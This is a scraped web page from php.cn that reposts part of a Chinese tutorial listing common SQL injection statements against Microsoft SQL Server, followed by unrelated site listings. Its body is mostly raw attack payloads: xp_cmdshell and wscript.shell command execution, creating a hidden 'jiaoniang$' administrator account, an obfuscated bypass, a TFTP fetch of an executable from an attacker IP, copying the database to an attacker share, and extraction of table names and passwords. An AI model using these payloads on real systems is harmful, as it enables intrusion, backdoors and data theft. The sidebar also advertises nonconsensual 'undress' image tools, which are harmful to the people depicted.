常用SQL注射语句解析（3）_MySQL-tutoriel mysql-php.cn

Maison

base de données

tutoriel mysql

常用SQL注射语句解析（3）_MySQL

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 01, 2016 pm 01:51 PM

test

bitsCN.com

aths(path)

　　values(@test)--

　　;use ku1;--

　　;create table cmd (str image);-- 建立image类型的表cmd

　　存在xp_cmdshell的测试过程：

　　;exec master..xp_cmdshell 'dir'

　　;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号

　　;exec master.dbo.sp_password null,jiaoniang$,1866574;--

　　;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--

　　;exec master.dbo.xp_cmdshell 'net user jiaoniang$ 1866574 /workstations:*

　　/times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--

　　;exec master.dbo.xp_cmdshell 'net localgroup administrators jiaoniang$

　　/add';--

　　exec master..xp_servicecontrol 'start', 'schedule' 启动服务

　　exec master..xp_servicecontrol 'start', 'server'

　　; DECLARE @shell INT EXEC SP_OACreate 'wscript.shell',@shell OUTPUT EXEC

　　SP_OAMETHOD @shell,'run',null, 'C：/WINNT/system32/cmd.exe /c net user

　　jiaoniang$ 1866574 /add'

　　;DECLARE @shell INT EXEC SP_OACreate 'wscript.shell',@shell OUTPUT EXEC

　　SP_OAMETHOD @shell,'run',null, 'C：/WINNT/system32/cmd.exe /c net

　　localgroup administrators jiaoniang$ /add'

　　'; exec master..xp_cmdshell 'tftp -i youip get file.exe'-- 利用TFTP上传文件

　　;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:/'

　　;declare @a sysname set @a='xp'+'_cm’+’dshell' exec @a 'dir c:/'

　　;declare @a;set @a=db_name();backup database @a to

　　disk='你的IP你的共享目录bak.dat'

　　如果被限制则可以。

　　select * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec

　　master.dbo.sp_addlogin hax')

　　查询构造：

　　Select * FROM news Where id=... AND topic=... AND .....

　　admin'and 1=(select count(*) from [user] where username='victim' and

　　right(left(userpass,01),1)='1') and userpass '

　　select 123;--

　　;use master;--

　　:a' or name like 'fff%';-- 显示有一个叫ffff的用户哈。

　　and 1(select count(email) from [user]);--

　　;update [users] set email=(select top 1 name from sysobjects where

　　xtype='u' and status>0) where name='ffff';--

　　;update [users] set email=(select top 1 id from sysobjects where xtype='u'

　　and name='ad') where name='ffff';--

　　';update [users] set email=(select top 1 name from sysobjects where

　　xtype='u' and id>581577110) where name='ffff';--

　　';update [users] set email=(select top 1 count(id) from password) where

　　name='ffff';--

　　';update [users] set email=(select top 1 pwd from password where id=2)

　　where name='ffff';--

　　';update [users] set email=(select top 1 name from password where id=2)

　　where name='ffff';--

　　上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。

　　通过查看ffff的用户资料可得第一个用表叫ad

　　然后根据表名ad得到这个表的ID 得到第二个表的名字

　　insert into users values( 666,

　　char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),

　　char(0x63)+char(0x68)+char(0x72)+c

bitsCN.com

Déclaration

Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn

Article connexe

Apple iPhone 16 Pro as Leica smartphone: Leica subsidiary confirms camera grip with official Leica appJun 13, 2024 pm 08:52 PM

LeicareleasedtheLeicaLuxcameraappfortheAppleiPhoneafewdaysago.However,theappwasnotdevelopedbyLeica,butbyFjorden.ThecompanyhasbeenknownprimarilyforitscameragripsfortheiPhoneandwasacquiredbyLeicainDecember2023.Fo

Remote 3 universal remote control comes with touchscreen, but without subscription or server obligationJun 14, 2024 am 09:13 AM

SincethedemiseofLogitech'spopularHarmonyremotecontrols,themarketforhigh-qualityuniversalremotecontrolshasbeenfragmentedatbest.UnfoldedCircleaimstoavoidthefateoftheHarmonyUltimatebyeliminatinganyserverobligationsorsubs

Samsung Galaxy S24 Ultra gains E Ink secondary display via inventive protective caseJun 14, 2024 am 10:44 AM

Anintriguingthird-partycasefortheGalaxyS24Ultra(curr.$1,099.99onAmazon)hasappearedonmarketplaceslikeAliExpress.Astheimagesthroughoutthisarticleshow,thecasehasasimplesiliconeconstruction.However,italsocontainsanEInkd

Light Phone 3 launches with 50% discount, monochrome OLED and minimalist designJun 13, 2024 pm 10:18 PM

WhiletheLightPhone2from2018wasstillequippedwithaneconomicale-inkdisplay,theLightPhone3usesanOLEDdisplaythatcanonlydisplaygrayscale.Thereasonfortheswitchtothe3.92-inchOLEDpanelwithitsresolutionof1,240x1,080isth

$Electric Ferraris will boast an \'authentic\' growl, claims marketing executive$ Electric Ferraris will boast an \'authentic\' growl, claims marketing executiveJun 14, 2024 am 10:26 AM

In2012,theeminentautomotivejournalistJeremyClarksonstatedthattheLamborghiniAventador,whichhewasreviewingatthetime,wouldbeamongthelastcarstofeatureanaturallyaspiratedV12.Morethanadecadelater,V12-poweredsupercarsareal

Jabra discontinues Elite wireless earbuds lineupJun 14, 2024 am 09:39 AM

TheJabraEliteserieshascometoanend,withGNCEOPeterKarlstromerannouncingthediscontinuationofthewirelessearbudswithinthelineupinapressrelease.Petersaysthatthechangingmarketdynamicsandhowchallengingithasbecometogetas

Audio-Technica unveils ATH-S300BT wireless headphones with hear-through noise-cancellation, 90 hours battery life, and multipoint pairingJun 14, 2024 am 09:46 AM

Audio-TechnicahasunveiledtheATH-S300BTwirelessheadphoneswithhear-throughnoise-cancellation,multipointpairing,and90hoursofbatterylife.Thenoise-cancellingfeaturehasthreemodes:off,on,andhear-through,whereambientsoundscanbehea

First complete PCIe 7.0 IP solution presented by Synopsys coming to market in 2025 for HPCs and AI supercomputersJun 14, 2024 am 09:19 AM

Backin2022,whenPCIe7.0wasstartingtotakeshapeasafuturestandard,PCIe5.0wasjusthittingtheservermarketsandtheprospectofseeingPCIe6.0devicesavailableanytimesoon,letalonePCIe7.0ones,wasquitefar-fetched.CurrentlyPCIe5

See all articles

Outils d'IA chauds

Undresser.AI Undress

Application basée sur l'IA pour créer des photos de nu réalistes

AI Clothes Remover

Outil d'IA en ligne pour supprimer les vêtements des photos.

Undress AI Tool

Images de déshabillage gratuites

Clothoff.io

Dissolvant de vêtements AI

AI Hentai Generator

Générez AI Hentai gratuitement.

Afficher plus

Article chaud

R.E.P.O. Crystals d'énergie expliqués et ce qu'ils font (cristal jaune)

2 Il y a quelques semainesBy尊渡假赌尊渡假赌尊渡假赌

Repo: Comment relancer ses coéquipiers

1 Il y a quelques moisBy尊渡假赌尊渡假赌尊渡假赌

Hello Kitty Island Adventure: Comment obtenir des graines géantes

4 Il y a quelques semainesBy尊渡假赌尊渡假赌尊渡假赌

Combien de temps faut-il pour battre Split Fiction?

3 Il y a quelques semainesByDDD

R.E.P.O. Enregistrer l'emplacement du fichier: où est-il et comment le protéger?

3 Il y a quelques semainesByDDD

Afficher plus

Outils chauds

Dreamweaver Mac

Outils de développement Web visuel

SublimeText3 version chinoise

Version chinoise, très simple à utiliser

SublimeText3 version Mac

Logiciel d'édition de code au niveau de Dieu (SublimeText3)

SublimeText3 version anglaise

Recommandé : version Win, prend en charge les invites de code !

DVWA

Damn Vulnerable Web App (DVWA) est une application Web PHP/MySQL très vulnérable. Ses principaux objectifs sont d'aider les professionnels de la sécurité à tester leurs compétences et leurs outils dans un environnement juridique, d'aider les développeurs Web à mieux comprendre le processus de sécurisation des applications Web et d'aider les enseignants/étudiants à enseigner/apprendre dans un environnement de classe. Application Web sécurité. L'objectif de DVWA est de mettre en pratique certaines des vulnérabilités Web les plus courantes via une interface simple et directe, avec différents degrés de difficulté. Veuillez noter que ce logiciel

Afficher plus

Sujets chauds

Où se trouve l’entrée de connexion pour la messagerie Gmail ?

7345

1627

1352

1265

1214